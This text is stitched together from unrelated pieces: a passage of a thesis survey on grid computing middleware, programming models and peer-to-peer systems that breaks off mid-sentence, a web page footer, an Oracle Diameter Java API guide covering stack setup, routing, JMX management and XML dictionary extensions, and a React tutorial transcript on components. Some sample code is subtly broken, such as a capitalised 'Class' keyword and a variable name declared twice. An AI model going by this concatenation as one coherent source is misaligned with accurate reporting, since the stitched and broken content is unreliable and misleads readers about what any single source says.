text of grid application development.The goal of the GrADS project is to simplify
distributed heterogeneous computing in the same way that the World Wide Web
simplified information sharing.Grid application development in GrADs involves the
following components:1) Resource selection is performed by accessing Globus MDS
and the Network Weather Service [117] to get information about the available ma-
chines,2) An application-specific performance modeler is used to determine a good
initial matching list for the application,3) and a contract monitor,which detects per-
formance degradation and accordingly does rescheduling to re-map the application
to better resources.The main components involved in application adaptation are the
contract monitor,the migrator,and the rescheduler which decides when to migrate.
The migrator component relies on application-support to enable migration.The Stop
Restart Software (SRS) [110] is a user-level checkpointing library used to equip the
application with the ability to be stopped,checkpointed,and restarted with a dif-
ferent configuration.The Rescheduler component allows migration on-request and
opportunistic migration.Migration cost is evaluated by considering the predicted
remaining execution time in the new configuration,the current remaining execution
time,and the cost of rescheduling.Migration happens only if the gain is greater than
a 30% threshold [109].
25
In the GridWay [59] project,the application specifies its resource requirements
and ranks the needed resources in terms of their importance.A submission agent
automates the entire process of submitting the application and monitoring its perfor-
mance.Application performance is evaluated periodically by running a performance
degradation evaluator program and by evaluating the accumulated suspension time.
The application has a job template which contains all the necessary parameters for
its execution.The framework evaluates if migration is worthwhile or not in case of
a rescheduling event.The submission manager is responsible for the execution of a
job during its lifetime.It is also responsible for performing job migration to a new
resource.The framework is responsible for submitting jobs,preparing RSL files,per-
forming resource selection,preparing the remote system,canceling the job in case of a
kill,stop,or migration event.When performance slowdown is detected,rescheduling
actions are initiated to detect better resources.The resource selector tries to find
jobs that minimize total response time (file transfer and job execution).Application-
level schedulers are used to promote the performance of each individual application
without considering the rest of the applications.Migration and rescheduling could
be user-initiated or application-initiated.
2.4 Grid Programming Models
To achieve an application adaptation to grid environment,not only should the
middleware provide the necessary means for state estimation,and reconfiguration of
resources.The application’s programming model should also allow the application to
react to the different reconfiguration requests from the underlying environment.This
functionality can take different forms,such as application migration,process migra-
tion,checkpointing,replication,partitioning,or change of application granularity.
We describe in what follows existing programming models that appear to be
relevant to grid environments and that provide some partial support for reconfigura-
tion.
• Remote procedure calls (RPC) [20].RPC uses the client-server model
to implement concurrent applications that communicate synchronously.The
RPC mechanism has been traditionally tailored for single-processor systems
26
and tightly coupled homogeneous systems.GridRPC is a collaboration effort
to extend the RPC model to support grid computing and to standardize its
interfaces and protocols.The extensions consist basically of providing support
for coarse-grained asynchronous systems.NetSolve [27] is a current implemen-
tation of GridRPC [92] based on a client-agent-server system.The role of the
agent is to locate suitable resources and select the best ones.Load balancing
policies are used to attempt a fair allocation of resources.Ninf [91] is another
implementation built on top of Globus services.
• Java-based models.Java is a powerful programming environment for de-
veloping platform-independent distributed systems.It was originally designed
with distributed computing in mind.The applet and Remote Method Invoca-
tion (RMI) models are some features of this design.The use of Java in grid
computing has gained even more interest since the introduction of web services
in the OGSI model.Several APIs and interfaces are being developed and inte-
grated with Java.The Java-Grande project is a huge collaborative effort trying
to bring Java platformup-to-speed for high-performance applications.The Java
Commodity Grid (CoG) toolkit [70] is another effort for providing Java-based
services for grid-computing.CoG provides an object-oriented interface to stan-
dard Globus toolkit services.
• Message passing.This model is the most widely used programming model for
parallel computing.It provides application developers with a set of primitive
tools that allowcommunication between the different tasks,collective operations
like broadcasts and reductions,and synchronization mechanisms.However,
message passing is still a low-level paradigm and does not provide high-level
abstractions for task parallelism.It requires a lot of expertise from developers
to achieve high performance.Popular message passing libraries include MPI
and the Parallel Virtual Machine (PVM) [41].MPI has been implemented suc-
cessfully on massively parallel processors (MPPS) and supports a wide range
of platforms.However,existing portable implementations target homogeneous
systems and have very limited support for heterogeneity.PVM provides sup-
27
port for dynamic addition of nodes and host failures.However,its limited
ability to meet the required high performance on tightly coupled homogeneous
systems did not encourage a wide adoption.Extensions to MPI to meet grid
requirements have been actively pursued recently.MPICH-G2 is a grid-enabled
implementation of MPI based on MPICH,a portable implementation of MPI.
MPICH-G2 is built upon the Globus toolkit.MPICH-G2 allows the use of
multiple heterogeneous machines to execute MPI applications.It automatically
converts data in messages sent between machines of different architectures and
supports multi-protocol process communication through automatic selection of
TCP for inter-machine messaging and more highly optimized vendor-supplied
MPI implementations (whenever available) for intra-machine messaging.
• Actor model [7,54].An actor is an autonomous entity that encapsulates
state and processing.Actors are concurrent entities that communicate asyn-
chronously.Processing in actors is solely triggered by message reception.In
response to a message,an actor can change its current state,create a new actor,
or send a message to other actors.The anatomy of actors facilitates autonomy,
mobility,and asynchronous communication and makes this model attractive for
open distributed systems.Several languages and frameworks have implemented
the Actor model (e.g.,SALSA [114],Actor Foundry [81],Actalk [23],THAL [63]
and Broadway [97]).A more detailed discussion of the Actor model and the
SALSA language is given in Section 2.6.
• Parallel Programming Models.Several models have emerged to abstract
application parallelism on distributed resources.The Master-Worker (MW)
model is a traditional parallel scheme whereby a master task defines dynam-
ically the tasks that must be executed and the data on which they operate.
Workers execute the assigned tasks and return the result to the master.This
model exhibits a very large degree of parallelism because it generates a dy-
namic number of independent tasks.This model is very well suited for grids.
The AppleS Master Worker Application Template (AMWT) provides adap-
tive scheduling policies for MW applications.The goal is to select the best
28
placement of the master and workers on grid resources to optimize the overall
performance of the application.The Fork-join model is another model where
the degree of parallelism is dynamically determined.In this model,tasks are
dynamically spawned and data is dynamically agglomerated based on system
characteristics such as the amount of workload or the availability of resources.
This model employs a two-level scheduling mechanism.First a number of vir-
tual processors are scheduled on a pool of physical processors.The virtual
processors represent kernel-level threads.Then user-level threads are spawned
to execute tasks from a shared queue.The forking and joining is done at the
user-level space because it is much faster than the kernel-level thread.Several
systems have implemented this model such as Cray Multitasking [88],Process
Control [51],and Minor [76].All the afore mentioned implementations have
been targeted mainly for shared-memory and tightly coupled systems.Other
effective parallel programming models have been studied,such as divide and
conquer applications and branch and bound.The Satin [112] system is an ex-
ample of a hierarchical implementation of the divide and conquer paradigm
targeted for grid environments.
2.5 Peer-to-Peer Systems and the Emerging Grid
Grid and peer-to-peer systems share a common goal:sharing and harnessing
resources across various administrative domains.However they both evolved from
different communities and provide different services.Grid systems focus on providing
a collaborative platformthat interconnects clusters,supercomputers,storage systems,
and scientific instruments from trusted communities to serve computationally inten-
sive scientific applications.Grid systems are of moderate size and are centrally or
hierarchically administered.Peer-to-peer (P2P) systems provide intermittent par-
ticipation for significantly larger untrusted communities.The most common P2P
applications are file sharing and search applications.It has been argued that grid
and P2P systems will eventually converge [48,99].This convergence will likely hap-
pen when the participation in grid increases to the scale of P2P systems,when P2P
systems will provide more sophisticated services,and when the stringent QoS require-
29
ments of grid systems are loosened as grids host more popular user applications.In
what follows,we give an overview of P2P systems.Then we give an overview of some
research efforts that have tried to utilize P2P techniques to serve grid computing.
The peer-to-peer paradigmis a successful model that has been proved to achieve
scalability in large-scale distributed systems.As opposed to traditional client-server
models,every component in a P2P systemassumes the same responsibilities acting as
both a client and a server.The P2P approach is intriguing because it has managed to
circumvent many problems with the client/server model with very simple protocols.
There are two categories of P2P systems based on the way peers are organized and
on the protocol used:unstructured and structured.Unstructured systems impose
no structure on the peers.Every peer in an unstructured system is randomly con-
nected to a number of other peers (e.g.Examples include Napster [3],Gnutella [33],
and KaZaA [2]).Structured P2P systems adopt a well-determined structure for in-
terconnecting peers.Popular structured systems include Chord [79],Pastry [74],
Tapestry [119],and CAN [98].
In a P2P system,peers can be organized in various topologies.These topologies
can be classified into centralized,decentralized and hybrid.Several p2p applications
have a centralized component.For instance,Napster,the first file sharing applica-
tion that popularized the P2P model,has a centralized search architecture.However,
the file sharing architecture is not centralized.The SETI@Home [13] project has
a fully centralized architecture.SETI@Home is a project that harnesses free CPU
cycles across the Internet (SETI is an acronym of Search for Extra-Terrestrial Intelli-
gence).The purpose of the project is to analyze radio telescope data for signals from
extra-terrestrial intelligence.One advantage of the centralized topology is the high
performance of the search because all the needed information is stored in one central
location.However,this centralized architecture creates a bottleneck and cannot scale
to a large number of peers.In the decentralized topology,peers have equal respon-
sibilities.Gnutella [33] is among the few pure decentralized systems.It has only an
initial centralized bootstrapping mechanism by which new peers learn about existing
peers and join the system.However,the search protocol in Gnutella is completely de-
centralized.Freenet is another application with a pure decentralized topology.With
30
Centralized
Decentralized
Hybrid
Figure 2.2:Sample peer-to-peer topologies:centralized,decentralized and
hybrid topologies.
decentralization comes the cost of having a more complex and more expensive search
mechanism.Hybrid approaches emerged with the goal of addressing the weaknesses
of centralized and decentralized topologies,while benefiting from their advantages.
In a hybrid topology,peers have various responsibilities depending on how important
they are in the search process.An example of a hybrid system is the KazaA [2]
system.KazaA is a hybrid of the centralized Napster and the decentralized Gnutella.
It introduced a very powerful concept:super peers.Super peers act as local search
hubs.Each super peer is responsible for a small portion of the network.It acts as a
Napster server.These special peers are automatically chosen by the system depend-
ing on their performance (storage capacity,CPU speed,network bandwidth,etc) and
their availability.Figure 2.2 shows example centralized,decentralized,and hybrid
topologies.
P2P approaches have been mainly used to address resource discovery and pres-
ence management in grid systems.Most current resource discovery mechanisms are
based on hierarchical or centralized schemes.They also do not address large scale dy-
namic environments where nodes join and leave at anytime.Existing research efforts
have borrowed several P2P dynamic peer management and decentralized protocols
to provide more dynamic and scalable resource discovery techniques in grid systems.
In [48] and [100],a flat P2P overlay is used to organize the peers.Every virtual
organization (VO) has one or more peers.Peers provide information about one or
31
more resources.In [48],different strategies are used to forward queries about resource
characteristics such as random walk,learning-based,and best-neighbor.A modified
version of the Gnutella protocol is used in [100] to route query messages across the
overlay of peers.Other projects [75,83] have adopted the notion of super peers
to organize,in a hierarchical manner,information about grid resources.Structured
P2P concepts have also been adopted for resource discovery in grids.An example is
the MAAN [26] project that proposes an extension of the Chord protocol to handle
complex search queries.
2.6 Worldwide Computing
Varela,et al.[10] introduced the notion and vision of the World-Wide Computer
(WWC) which aims at turning the widespread resources in the Web into a virtual
mega-computer with a unified,dependable and distributed infrastructure.The WWC
provides naming,mobility,and coordination constructs to facilitate building widely
distributed computing systems over the Internet.The architecture of the WWC
consists of three software components:1) SALSA,a programming language for appli-
cation development,2) a distributed runtime environment with support for naming
and message sending,and 3) a middleware layer with a set for services for recon-
figuration,resource monitoring,and load balancing.Figure 2.3 shows the layered
architecture of the World-Wide Computer.
The WWC views all software components as a collection of actors.The Actor
model has been fundamental to the design and implementation of the WWC architec-
ture.We discuss in what follows concepts related to the Actor model of computation
and the SALSA programming language.
2.6.1 The Actor Model
The concept of actors was first introduced by Carl Hewitt at MITin the 1970’s to
refer to autonomous reasoning agents [54].The concept evolved further with the work
of Agha and others to refer to a formal model of concurrent computation [9].This
model contrasts with (and complements) the object-oriented model by emphasizing
concurrency and communication between the different components.
32
Figure 2.3:AModel for Worldwide Computing.Applications run on a vir-
tual network (a middleware infrastructure) which maps actors
to locations in the physical layer (the hardware infrastructure).
Actors are inherently concurrent and distributed objects that communicate with
each other via asynchronous message passing.An actor is an object because it encap-
sulates a state and a set of methods.It is autonomous because it is controlled by a
Log in to post a comment | https://www.techylib.com/en/view/bootlessbwak/a_framework_for_the_dynamic_reconfiguration_of_scientific_applica | CC-MAIN-2017-22 | en | refinedweb |
This appendix describes programming Oracle Diameter applications in the following sections:
"IP and Routes Configuration"
"Tracing and Logging Mechanism"
Before a Java Diameter application is able to process messages exchanged with a distant peer, the IP configuration and Diameter protocol-specific configuration have to be done by the application as follows:
Create a
DiameterStack instance.
Register the Diameter application to the Diameter stack.
Create listening points to bind to local transport addresses.
Configure routes and connect to Diameter peers.
An instance of the Diameter stack can be created as follows:
import oracle.sdp.diameter.*; DiameterFactory myFactory; DiameterStack myStack; myFactory = DiameterFactory.getInstance(); myStack = myFactory.createDiameterStack("realm.domain.com", "server.realm.domain.com", null);
This code creates a Diameter stack for use by the local Diameter node in which Fully Qualified Domain Name (FQDN) is
server.realm.domain.com and Origin Realm is
realm.domain.net.
When a Diameter application needs to listen for incoming connections on one or several transport addresses, it has to create one or several instances of the
DiameterListeningPoint interface:
String localURI = "aaa://server.realm.domain.com:41001"; myStack.createDiameterListeningPoint(localURI);
As soon as the listening point has been created, the Diameter stack is ready to accept incoming connection from remote peers. If the Diameter stack receives a connection request from a peer that as not been declared in the routing table, then the
isUnknownPeerAuthorized() of the
DiameterListener interface is called. The connection is accepted only if this method returns true.
Note:There is no need for the user application to keep the references on the listening points since they can be retrieved later by calling
DiameterStack.getDiameterListeningPoints().
A Diameter client application can declare remote peers by using the
createDiameterRoute()method.
The code fragment illustrated in Example B-1 configures two Diameter realms,
realm1.domain.com and
realm2.domain.com. The first realm is served by two peers:
peer1.realm1.domain.com and
peer2.realm1.domain.com, whereas the second realm is served by only one peer,
peer.realm2.domain.com. The metric values (1 and 2) are such that
peer1 and
peer2 are set up in master/backup mode. Example B-1 illustrates this source code for setting up this peer configuration.
Example B-1 Configuring Peers
myStack.createDiameterRoute("ExampleApp", "realm1.domain.com", "aaa://peer1.realm1.domain.com", 1); myStack.createDiameterRoute("ExampleApp", "realm1.domain.com", "aaa://peer2.realm1.domain.com", 2); myStack.createDiameterRoute("ExampleApp", "realm2.domain.com", "aaa://peer.realm2.domain.com:41002", 1);
Note:If a peer name (FQDN) is used in
createDiameterRoute()and if that peer is not yet known to the local stack, a transport connection is initiated with the peer using the specified peer URI (taking into account any URI optional information such as port number and transport protocol). On the contrary, if the peer specified by the FQDN part of the URI is already known, the URI is ignored, and the existing peer entry is added to the routing table for the specified realm and application ID.
The
DiameterRealmStateChangeEvent class is used to notify the application of the reachability or unreachability of a remote realm as a result of peers coming up or down. This is important because the Diameter stack will not accept an outgoing message for which the remote realm is not available. Therefore, the application should wait until the realm is available before sending requests.
A
RealmStateChange event is passed to
DiameterListener.processEvent() whenever the availability of a pair (Remote-Realm, Application-ID) changes. The availability of a remote realm for a given application ID depends on the availability of active connections to at least one remote peer that is able to serve the specific realm and application ID. Since the route is not available, the application is not able to exchange messages with the remote realm peers.
Example B-2 illustrates a typical implementation of the
DiameterListener.processEvent() method.
Example B-2 Implementing the DiameterListener.processEvent() Method
public void processEvent(DiameterEvent event) { if (event instanceof DiameterRealmStateChangeEvent) { // A remote realm has become available or unavailable DiameterRealmStateChangeEvent event = (DiameterRealmStateChangeEvent)event; if (event.isRealmAvailable()) { System.out.println("Realm " + event.getRealm() + " is available"); } else { System.out.println("Realm " + event.getRealm() + " is unavailable"); } // ... }
Upon Diameter stack initialization, a set of defined counters is initialized and associated to each
DiameterStack and
DiameterProvider instance created by the application. These counters are defined in the
DiameterStackImplMBean and
DiameterProviderImplMBean management interfaces.
There are two ways to access to these counters:
Directly, by calling one of the different methods defined in both management interface.
Remotely, by registering the Diameter MBeans to a JMX agent using javax.management package. Only the JDK 1.5 provides this package.
There are two management interfaces defined in the
oracle.sdp.diameterimpl package:
DiameterStackImplMBean: This interface represents the management API for an instance of the
DiameterStack interface.
DiameterProviderImplMBean: This interface represents the management API for an instance of the
DiameterProvider interface
Example B-3 illustrates how to directly get the value of one of these defined counters:
A Diameter Application can be managed remotely by registering the Diameter MBeans to a JMX agent and can be monitored by using the Java JConsole program.
A Java application using the Diameter API can publish management information by registering instances of the
DiameterStackImplMBean and
DiameterProviderImplMBean interfaced to a JMX agent. This can be done as follows:
import javax.management.MBeanServerFactory; import javax.management.MBeanServer; import javax.management.ObjectName; import oracle.sdp.diameter.*; // Create DiameterStack and DiameterProvider instances. // DiameterStack myStack = ... // DiameterProvider myProvider = ... List srvList = MBeanServerFactory.findMBeanServer(null); if (srvList.isEmpty() == false) { MBeanServer server = (MBeanServer)srvList.iterator().next(); try { ObjectName name; name = new ObjectName( "oracle.sdp.diameterimpl:name=DiameterProvider"); server.registerMBean(myProvider, name); name = new ObjectName("oracle.sdp.diameterimpl:name=DiameterStack"); server.registerMBean(myStack, name); } catch (Exception e) { // Handle register exception // ... } }
Note:This code requires the JDK 1.5 or later. Previous versions do not have the required
javax.managementpackage.
If you intend to allow remote access to the MBeans, you must define the Java property
com.sun.management.jmxremote when running your application, as follows:
java -Dcom.sun.management.jmxremote -classpath mdiameter.jar MyApplication
When you have a Diameter application running -- and provided you have registered the MBeans as described above -- you can use the JDK's jconsole application to browse the management characteristics of the stack and application.
Start jconsole as follows:
jconsole
And then select the application's JVM from the local list. The Diameter MBeans should be visible under the MBeans tab.
This section includes the following topics:
When a user's application requires using commands or AVPs that are not defined in the default loaded application dictionary, the user can extend the dictionary to define new commands and/or AVPs syntaxes to be used by the Diameter stack.
The root or top-level element of a Diameter dictionary extension is the
<dictionary> element:
<dictionary> .... (other elements) </dictionary>
The
<dictionary> element contains zero or more
<vendor> elements and zero or more
<application> elements.
The
<vendor> element defines a vendor by a name and associated IANA.
The
<vendor> attributes are:
The vendor
id attribute must be unique across all
<vendor> element definitions of the dictionary. The value 0 is dedicated to the base protocol which corresponds to the syntaxes defined in [RFC-3588] and [RFC-4006].
The vendor
name attribute is some text describing the vendor.
In Example B-4, the
<vendor> element defines the vendor named "3GPP" whose enterprise code is 10415:
Example B-4 Defining a Vendor
<dictionary> <vendor id="10415" name="3GPP"> ....(other elements) </vendor> </dictionary>
The
<vendor> element contains zero or more
<returnCode> elements and zero or more
<avp> elements.
One of the ways in which the Diameter protocol can be extended is through the addition of new applications.
The
<application> element defines the new commands needed to support a new vendor Diameter application.
The
<application> attributes are:
The application
id attribute is the IANA-assigned Application Identifier for this application. The value 0 is dedicated to the base protocol which corresponds to the commands defined in RFC-3588 and RFC-4006.
The application
name attribute is the human-readable name of this application.
The application
vendor attribute is the name of the application vendor as previously defined in the
<vendor> element.
The application
service-type attribute defined the type of service delivered by the application. Possible values are "Acct" for accounting and "Auth" for authorization.
In Example B-5, the
<application> element contains information for the 3GPP accounting "Rf" application identified by the value "3":
Example B-5 Defining an <application> Element
<dictionary> <application id="3" name="Rf" vendor="3GPP" service- ....(other elements) </application> </dictionary>
The
<application> element contains zero or more
<command> elements.
A
<command> element defines the attributes for a command.
The
<command> attributes are:
The command
name attribute defines the name of the command. Because only one command is defined for both "Request" and "Answer" portions, the "Accounting" command defines both "Accounting-Request" and "Accounting-Answer" messages.
The command
code attribute defines the command code used to transmit this command.
In Example B-6, the Rf application contains the command "Accounting" whose code is 271:
The
<returnCode> element defines a possible value of the Result-Code AVP. In Example B-7, the 3GPP vendor defines the
returnCode 5030 named
DIAMETER_USER_UNKNOWN.
The
<avp> element defines an AVP as described in RFC-3588.
The
<avp> attributes are:
The avp
name attribute is the human-readable name of this AVP.
The avp
code attribute defines the integer value used to encode the AVP for transmission on the network.
The avp
mandatory attribute defines whether the mandatory bit of this AVP should or should not be set. Possible values are "must" or "mustnot".
The avp
protected attribute defines whether the protected bit of this AVP should or should not be set. Possible values are "may" or "maynot".
The avp
may-encrypt attribute defines whether the AVP has to be encrypted in case of CMS security usage. Possible values are "yes" or "no".
The avp
vendor-specific attribute specifies if this is a vendor specific AVP or not. Possible values are "yes" or "no".
In Example B-8, the 3GPP vendor extends the dictionary with the AVP "Application-provided-called-party-address".
Example B-8 Defining the <avp> Element
<dictionary> <vendor id="10415" name="3GPP"> <avp name="Application-provided-called-party-address" code="837" mandatory="mustnot" protected="may" may- .... </avp> </vendor> </dictionary>
The
<avp> element regroups either a
<type> element or a
<grouped> element.
The
<type> element defines the data type of the AVP in which it appears. This element must appear in all non-grouped AVP definitions.
The
type-name attribute of the
<type> element contains the data type name as defined in RFC-3588: Possible values are:
"OCTETSTRING"
"INTEGER32"
"INTEGER64"
"UNSIGNED32"
"UNSIGNED64"
"FLOAT32"
"FLOAT64"
"ADDRESS"
"IPADDRESS"
"TIME"
"UTF8STRING"
"DIAMETERIDENTITY"
"DIAMETERURI"
"IPFILTERRULE"
"QOSFILTERRULE"
"ENUMERATED"
"GROUPED"
Note:These values are case-sensitive.
In Example B-9, the AVP "Application-provided-called-party-address" is an UTF8String.
The
<enum> element defines a name which is mapped to an Unsigned32 value used in encoding and decoding AVPs of type Unsigned32. Enumerated elements should only be used with Unsigned32 typed AVPs.
The
<enum> element's attributes are:
The enum
name attribute is the text corresponding to a particular value for the attribute.
The enum
code attribute is the Unsigned32 value corresponding to this enumerated value
In Example B-10, the Accounting-Record-Type AVP has four values: EVENT_RECORD, START_RECORD, INTERIM_RECORD and STOP_RECORD.
Example B-10 Defining the <enum> Element
<dictionary> <vendor id="10415" name="3GPP"> <avp name="Accounting-Record-Type" code="480" mandatory="must" protected="may" may- <type type- <enum name="EVENT_RECORD" code="1"/> <enum name="START_RECORD" code="2"/> <enum name="INTERIM_RECORD" code="3"/> <enum name="STOP_RECORD" code="4"/> </avp> </vendor> </dictionary>
The
<grouped> element defines an AVP which encapsulates a sequence of AVPs together as a single payload. It consists in grouping one or more
<gavp> elements. This way, a single "grouped" element can contain references to multiple AVPs. Each
<gavp> element holds an AVP
name and a
vendor-id attribute.
The <gavp> attributes are:
The gavp
name attribute must correspond to some existing AVP's
name attribute.
The gavp
vendor-id attribute refers to an existing vendor's
id attribute.
In Example B-11, the 3GPP vendor defines an AVP named "CC-Money" which is a set of previously defined AVPs named "Unit-Value" and "Currency-Code".
Once the Diameter dictionary extension has been defined, use the
extendGrammar() method to apply the extension to the default dictionary as follows:.
//--> Define dictionary extension string String\n" + "<dictionary>\n" + " <vendor id=\"10415\" name=\"3GPP\">\n" + " </vendor>\n" + " <application id=\"3\" name=\"Rf\" vendor=\"3GPP\" \n" + " service-type=\"Acct\">\n" + " <command name=\"Accounting\" code=\"271\" />\n" + " </application>\n" + "</dictionary>\n"; //--> Apply new extension to current dictionary try { myStack . extendGrammar(myDictionary); } catch (DiameterException e) { // Handle dictionary syntax errors ... }
For increased flexibility in a real application, you may want to read the XML syntax description from a file rather than having it embedded in the Java source code. This way, it becomes possible to change the mapping between names and codes without recompiling the application.
The 3GPP
Rf Interface dictionary is returned by
getRfDictionary() and the 3GPP
Ro Interface dictionary is returned by
getRoDictionary() and can be extended by the Diameter stack.
The
DiameterTraceLoggerListener class is an interface to the Diameter tracing and logging mechanism. This interface represents the communication channel implemented by an application to receive debug traces and logs from the Diameter stack implementation. Logs are messages targeted to the user of
DiameterStack. Traces are for internal use and are meaningful only to people with a good knowledge of the
DiameterStack implementation.
All the messages that may be sent through the
DiameterTraceLoggerListener.log() logging interface are defined in
LogMessages.def. There is no definition file for trace messages.
By default, logs are sent to stdout and traces are not sent. This behavior may be modified by users either by registering a user-defined subclass of
DiameterTraceLoggerListener or by defining specific environment variables. An example of a
DiameterTraceLoggerListener implementation is as follows:
Class MyTraceLoggerListener implements DiameterTraceLoggerListener { // true or false. public boolean isTracingEnabled() { return true; } public void log (String file, int line, int severity, String message) { String severity; switch (severity) { case LOG_INFO_SEVERITY: severity="INFO"; break; case LOG_WARNING_SEVERITY: severity="WARNING"; break; case LOG_ERROR_SEVERITY: severity="ERROR"; break; case LOG_DISASTER_SEVERITY: severity="DISASTER"; break; default: severity="?"; break; } // ... } public void trace (String file, int line, int mask, String message) { System.err.println(...); } } | http://docs.oracle.com/cd/E12529_01/doc.1013/e10293/diameter21.htm | CC-MAIN-2017-22 | en | refinedweb |
Python has a reasonably good standard library module for handing dates and times but it can be a little confusing to a beginner probably because the first code they encounter will look something like the below with very little explanation.
import datetime print("Running on %s" % (datetime.date.today())) myDate = datetime.datetime(2018,6,18,16,13,0)
Why is it datetime.datetime? It is a simple explanation but one I’ve rarely seen included.
All Pythons classes for handling dates and times are in the module called datetime (naturally enough). This module contains a class for dates with no time element (datetime.date), a class for times (datetime.time) and a class for when you need both called unsurprisingly (but a little unfortunately) datetime.datetime, hence the code above.
It also contains 2 more classes; datetime.timedelta which is the interval between two dates / datetimes (the result of subtracting one datetime from another) and tzinfo, standard for time zone info, which is used to handle timezones in the time and datetime classes.
To add to the confusion, if you want to to get the date / time / datetime as of now, there is not a standard across the three; datetime uses the now() method, date uses the today() method and time does not have one! You have to use datetime and get the time part as below
import datetime # Get the date and time as of now as a datetime print(datetime.datetime.now()) # Get the date as of now (today) print(datetime.date.today()) # Get the time as of now - have to use datetime! print(datetime.datetime.now().time())
The confusion does not end there. If you want to format the date / time / datetime in a particular way you can use the strftime() method – probably short for string format time. The same method exists in all classes. Why it is called time and not date or something more generic is beyond me, datetime.date.strftime() makes little sense.
If you are reading in strings and need them parsed into a date / time / datetime there is strptime() method – probably short for string parse time – but this only exists in the datetime class. So you have to use a similar trick as above and create a datetime and extract just the date or time part.
Once you get passed the quirks above, you should find the datetime module straight forward to use. However if you do find yourself needing a library with more power, try the dateutil library. It can be installed with the usual pip install python-datetutil command. | https://quackajack.wordpress.com/category/core-language/ | CC-MAIN-2018-47 | en | refinedweb |
Abstract base class to use for preprocessor-based frontend actions. More...
#include "clang/Frontend/FrontendAction.h"
Abstract base class to use for preprocessor-based frontend actions.
Definition at line 287 of file FrontendAction.h.
Provide a default implementation which returns aborts; this method should never be called by FrontendAction clients.
Implements clang::FrontendAction.
Definition at line 1024 of file FrontendAction.cpp.
Does this action only use the preprocessor?
If so no AST context will be created and this action will be invalid with AST file inputs.
Implements clang::FrontendAction.
Definition at line 295 of file FrontendAction.h. | http://clang.llvm.org/doxygen/classclang_1_1PreprocessorFrontendAction.html | CC-MAIN-2018-47 | en | refinedweb |
Exploring node2vec - a graph embedding algorithm
In my explorations of graph based machine learning, one algorithm I came across is called node2Vec. The paper describes it as "an algorithmic framework for learning continuous feature representations for nodes in networks".
So what does the algorithm do? From the website:
The node2vec framework learns low-dimensional representations for nodes in a graph by optimizing a neighborhood preserving objective. The objective is flexible, and the algorithm accommodates for various definitions of network neighborhoods by simulating biased random walks.
Running node2Vec
We can try out an implementation of the algorithm by executing the following instructions:
git clone git@github.com:snap-stanford/snap.git cd snap/examples/node2vec make
We should end up with an executable file named
node2vec:
$ ls -alh node2vec -rwxr-xr-x 1 markneedham staff 4.3M 11 May 08:14 node2vec
The download includes the Zachary Karate Club dataset. We can inspect that dataset to see what format of data is expected.
The data lives in
graph/karate.edgelist.
The contents of that file are as follows:
cat graph/karate.edgelist | head -n10 1 32 1 22 1 20 1 18 1 14 1 13 1 12 1 11 1 9 1 8
The algorithm is then executed like this:
./node2vec -i:graph/karate.edgelist -o:emb/karate.emb -l:3 -d:24 -p:0.3 -dr -v
$ cat emb/karate.emb | head -n5 35 24 31 -0.0419165 0.0751558 0.0777881 -0.13651 -0.0723484 0.131121 -0.133643 0.0329049 0.0891693 0.0898324 0.0177763 -0.0947387 0.0152228 -0.00862188 0.0383254 0.222333 0.117794 0.189328 0.0327467 0.142506 -0.0787722 0.0757344 -0.0127497 -0.0305164 33 -0.105675 0.287809 0.20373 -0.247271 -0.222551 0.257689 -0.258127 0.0844224 0.182316 0.178839 0.0792992 -0.166362 0.114856 0.0422123 0.152787 0.551674 0.332224 0.487846 0.0619851 0.386913 -0.142459 0.173472 0.0184598 -0.100818 34 0.0121748 0.0941794 0.20482 -0.430609 -0.08399 0.293788 -0.322655 0.0704057 0.116873 0.214754 0.138378 -0.207141 -0.0159013 -0.238914 0.037141 0.541439 0.324653 0.458905 0.0216556 0.270057 -0.204671 0.135203 -0.0818273 -0.122353 14 -0.0722407 0.162659 0.111612 -0.20907 -0.11984 0.15896 -0.175391 0.0642012 0.094021 0.125609 0.0465577 -0.131715 0.0683675 -0.0097801 0.0467595 0.340551 0.210111 0.279932 0.0283343 0.231359 -0.112208 0.114253 0.00908989 -0.0907061
We now have an embedding for each of our people.
These embeddings aren’t very interesting on their own but we can do interesting things with them. One approach when doing exploratory data analysis is to reduce each of the vectors to 2 dimensions so that we can visualise them more easily.
t-SNE
t-Distributed Stochastic Neighbor Embedding (t-SNE) is a popular technique for doing this and has implementations in many languages. We’ll give the Python version a try, but there is also a Java version if you prefer that.
Once we’ve downloaded that we can create a script containing the following code:
from tsne import tsne import numpy as np import pylab X = np.loadtxt("karate.emb", skiprows=1) X = np.array([x[1:] for x in X]) Y = tsne(X, 2, 50, 20.0) pylab.scatter(Y[:, 0], Y[:, 1], 20) pylab.show()
We load the embeddings from the file we created earlier, making sure to skip the first row since that contains the node id which we aren’t interested in here. If we run the script it will output this chart:

It’s not all that interesting to be honest! This type of visualisation will often reveal a clustering between items but that isn’t the case here.
Now I need to give this a try on a bigger dataset to see if I can find some interesting insights!
About the author
Mark Needham is a Developer Relations Engineer for Neo4j, the world's leading graph database. | https://markhneedham.com/blog/2018/05/11/exploring-node2vec-graph-embedding-algorithm/ | CC-MAIN-2018-47 | en | refinedweb |
#include <string>
#include <wx/string.h>
Go to the source code of this file.
Definition at line 47 of file utf8.h.
Referenced by UTF8::operator+=(), UTF8::operator=(), and UTF8::UTF8().
Definition at line 27 of file numeric_evaluator.cpp.
Function IsUTF8 tests a c-string to see if it is UTF8 encoded.
BTW an ASCII string is a valid UTF8 string.
Definition at line 173 of file utf8.cpp.
References UTF8::end(), next(), and UTF8::uni_forward(). | http://docs.kicad-pcb.org/doxygen/utf8_8h.html | CC-MAIN-2018-47 | en | refinedweb |
Scroll down to the script below, click on any sentence (including terminal blocks!) to jump to that spot in the video!Cool, got it!
Course: JavaScript for PHP Geeks: ReactJS (with Symfony) Tutorial
gstreamer0.10-ffmpeg
gstreamer0.10-plugins-goodpackages.
It works like this: we create React element objects and ask React to render them. But, React has another important object: a Component. Ooooooooo.
It looks like this: create a class called
RepLogApp and extend something called
React.Component. A component only needs to have one method
render(). Inside, return whatever element objects you want. In this case I'm going to copy my JSX from above and, here, say
return and paste.
This is a React component. Below, I'm going to use
console.log() and then treat my
RepLogApp as if it were an element:
<RepLogApp />.
Finally, below, instead of rendering an element, we can render the component with that same JSX syntax:
<RepLogApp />.
Ok, go back and refresh! Awesome! We get the exact same thing as before! And, check out the console! The component becomes a React element!
This React component concept is something we're going to use a lot. But, I don't want to make it seem too important: because it's a super simple concept. In PHP, we use classes as a way to group code together and give that code a name that makes sense. If we organize 50 lines of code into a class called "Mailer", it becomes pretty obvious what that code does... it spams people! I mean, it emails valued customers!
